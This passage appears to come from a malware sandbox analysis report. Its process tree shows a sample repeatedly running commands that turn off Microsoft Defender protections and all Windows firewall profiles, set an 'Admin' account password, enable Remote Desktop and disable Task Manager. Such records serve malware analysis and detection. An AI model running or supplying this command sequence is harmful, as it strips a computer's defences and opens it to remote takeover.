        PID:3312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        52⤵
        
        PID:8844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        52⤵
        
        PID:5588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        52⤵
        
        PID:2624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        52⤵
        
        PID:6524
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        52⤵
        
        PID:9996
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        52⤵
        
        PID:5404
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        52⤵
        
        PID:9072
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        52⤵
        
        PID:3792
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        52⤵
        
        PID:9912
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        52⤵
        
        PID:9408
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        50⤵
        
        PID:7744
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        51⤵
        
        PID:7544
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        50⤵
        
        PID:5948
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        50⤵
        
        PID:6780
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        50⤵
        
        PID:4452
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        50⤵
        
        PID:6008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        50⤵
        
        PID:7172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        50⤵
        
        PID:7148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        50⤵
        
        PID:8684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        50⤵
        
        PID:8056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        50⤵
        
        PID:7116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        50⤵
        
        PID:8144
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        50⤵
        
        PID:7244
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        50⤵
        
        PID:9620
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        50⤵
        
        PID:9980
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        50⤵
        Modifies Windows Firewall
        
        PID:9648
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        50⤵
        
        PID:5476
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        50⤵
        
        PID:9996
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        50⤵
        
        PID:6596
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        48⤵
        
        PID:7872
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        49⤵
        
        PID:7900
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        48⤵
        
        PID:5132
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        48⤵
        
        PID:7720
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        48⤵
        
        PID:7376
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        48⤵
        
        PID:7704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        48⤵
        
        PID:2524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        48⤵
        
        PID:3272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        48⤵
        
        PID:6952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        48⤵
        
        PID:6404
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        48⤵
        Modifies Windows Firewall
        
        PID:9616
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        48⤵
        
        PID:8316
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        48⤵
        Modifies Windows Firewall
        
        PID:7180
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        48⤵
        
        PID:9380
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        48⤵
        
        PID:8380
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        48⤵
        
        PID:6596
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        48⤵
        Modifies Windows Firewall
        
        PID:5772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        48⤵
        
        PID:4444
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        46⤵
        
        PID:5192
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        47⤵
        
        PID:6668
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        46⤵
        
        PID:6672
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        46⤵
        
        PID:7376
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        46⤵
        
        PID:7972
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        46⤵
        
        PID:7220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        46⤵
        
        PID:7000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        46⤵
        
        PID:7484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        46⤵
        
        PID:636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        46⤵
        
        PID:8672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        46⤵
        
        PID:4680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        46⤵
        
        PID:8396
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        46⤵
        
        PID:5816
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        46⤵
        
        PID:8208
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        46⤵
        
        PID:6052
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        46⤵
        
        PID:8476
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        46⤵
        Modifies Windows Firewall
        
        PID:6608
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        46⤵
        
        PID:8668
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        46⤵
        Modifies Windows Firewall
        
        PID:6628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        46⤵
        
        PID:7272
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        44⤵
        
        PID:6056
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        45⤵
        
        PID:7004
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        44⤵
        
        PID:6632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        44⤵
        
        PID:6804
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        44⤵
        
        PID:6168
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        44⤵
        
        PID:6460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        44⤵
        
        PID:7792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        44⤵
        
        PID:5868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        44⤵
        
        PID:9116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        44⤵
        
        PID:8668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        44⤵
        
        PID:7328
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        44⤵
        
        PID:9428
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        44⤵
        
        PID:8704
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        44⤵
        Modifies Windows Firewall
        
        PID:9072
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        44⤵
        Modifies Windows Firewall
        
        PID:10232
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        44⤵
        Modifies Windows Firewall
        
        PID:9660
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        44⤵
        
        PID:4836
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        44⤵
        Modifies Windows Firewall
        
        PID:9252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        44⤵
        
        PID:8000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9772
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        42⤵
        
        PID:6956
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        43⤵
        
        PID:7060
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        42⤵
        
        PID:6136
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        42⤵
        
        PID:5428
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        42⤵
        
        PID:6736
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        42⤵
        
        PID:6812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        42⤵
        
        PID:6388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        42⤵
        
        PID:7916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        42⤵
        
        PID:6820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        42⤵
        
        PID:7396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        42⤵
        
        PID:8776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        42⤵
        
        PID:8448
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        42⤵
        
        PID:8540
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        42⤵
        
        PID:5128
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        42⤵
        Modifies Windows Firewall
        
        PID:9276
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        42⤵
        Modifies Windows Firewall
        
        PID:9772
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        42⤵
        
        PID:7404
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        42⤵
        
        PID:8888
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        42⤵
        
        PID:5812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        42⤵
        
        PID:8536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        42⤵
        
        PID:9436
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        40⤵
        
        PID:7052
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        41⤵
        
        PID:6904
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        40⤵
        
        PID:7052
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        40⤵
        
        PID:4048
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        40⤵
        
        PID:5648
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        40⤵
        
        PID:5656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        40⤵
        
        PID:8096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        40⤵
        
        PID:3704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        40⤵
        
        PID:6052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6252
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        40⤵
        
        PID:8096
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        40⤵
        
        PID:8596
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        40⤵
        Modifies Windows Firewall
        
        PID:8176
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        40⤵
        
        PID:9592
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        40⤵
        
        PID:9516
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        40⤵
        Modifies Windows Firewall
        
        PID:10080
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        40⤵
        
        PID:7500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        40⤵
        
        PID:10020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        40⤵
        
        PID:3612
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        38⤵
        
        PID:6492
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        39⤵
        
        PID:6892
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        38⤵
        
        PID:6436
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        38⤵
        
        PID:5816
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        38⤵
        
        PID:5428
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        38⤵
        
        PID:6024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        38⤵
        
        PID:5700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        38⤵
        
        PID:6532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        38⤵
        
        PID:6148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        38⤵
        
        PID:7784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        38⤵
        
        PID:6632
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        38⤵
        
        PID:440
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        38⤵
        
        PID:6472
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        38⤵
        
        PID:8728
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        38⤵
        
        PID:8772
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        38⤵
        Modifies Windows Firewall
        
        PID:8468
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        38⤵
        
        PID:6208
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        38⤵
        Modifies Windows Firewall
        
        PID:9600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        38⤵
        
        PID:3524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        38⤵
        
        PID:8368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        38⤵
        
        PID:10164
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        36⤵
        
        PID:6624
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        37⤵
        
        PID:1692
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        36⤵
        
        PID:5708
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        36⤵
        
        PID:5452
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        36⤵
        
        PID:6052
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        36⤵
        
        PID:6616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        36⤵
        
        PID:6508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        36⤵
        
        PID:3860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        36⤵
        
        PID:3564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        36⤵
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        36⤵
        
        PID:6568
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        36⤵
        Modifies Windows Firewall
        
        PID:8900
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        36⤵
        
        PID:5844
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        36⤵
        
        PID:4692
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        36⤵
        
        PID:6628
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        36⤵
        Modifies Windows Firewall
        
        PID:8688
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        36⤵
        
        PID:4680
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        36⤵
        
        PID:7980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        36⤵
        
        PID:4588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        36⤵
        
        PID:6816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        36⤵
        
        PID:8832
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        34⤵
        
        PID:5700
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        35⤵
        
        PID:6744
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        34⤵
        
        PID:5804
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        34⤵
        
        PID:5336
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        34⤵
        
        PID:5932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        34⤵
        
        PID:5664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        34⤵
        
        PID:5536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        34⤵
        
        PID:4424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        34⤵
        
        PID:1260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        34⤵
        
        PID:7000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        34⤵
        
        PID:7220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        34⤵
        
        PID:6492
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        34⤵
        
        PID:1960
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        34⤵
        
        PID:8092
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        34⤵
        
        PID:7044
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        34⤵
        
        PID:8328
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        34⤵
        
        PID:6472
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        34⤵
        
        PID:9076
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        34⤵
        
        PID:3032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        34⤵
        
        PID:6148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        34⤵
        
        PID:8060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        34⤵
        
        PID:8144
        
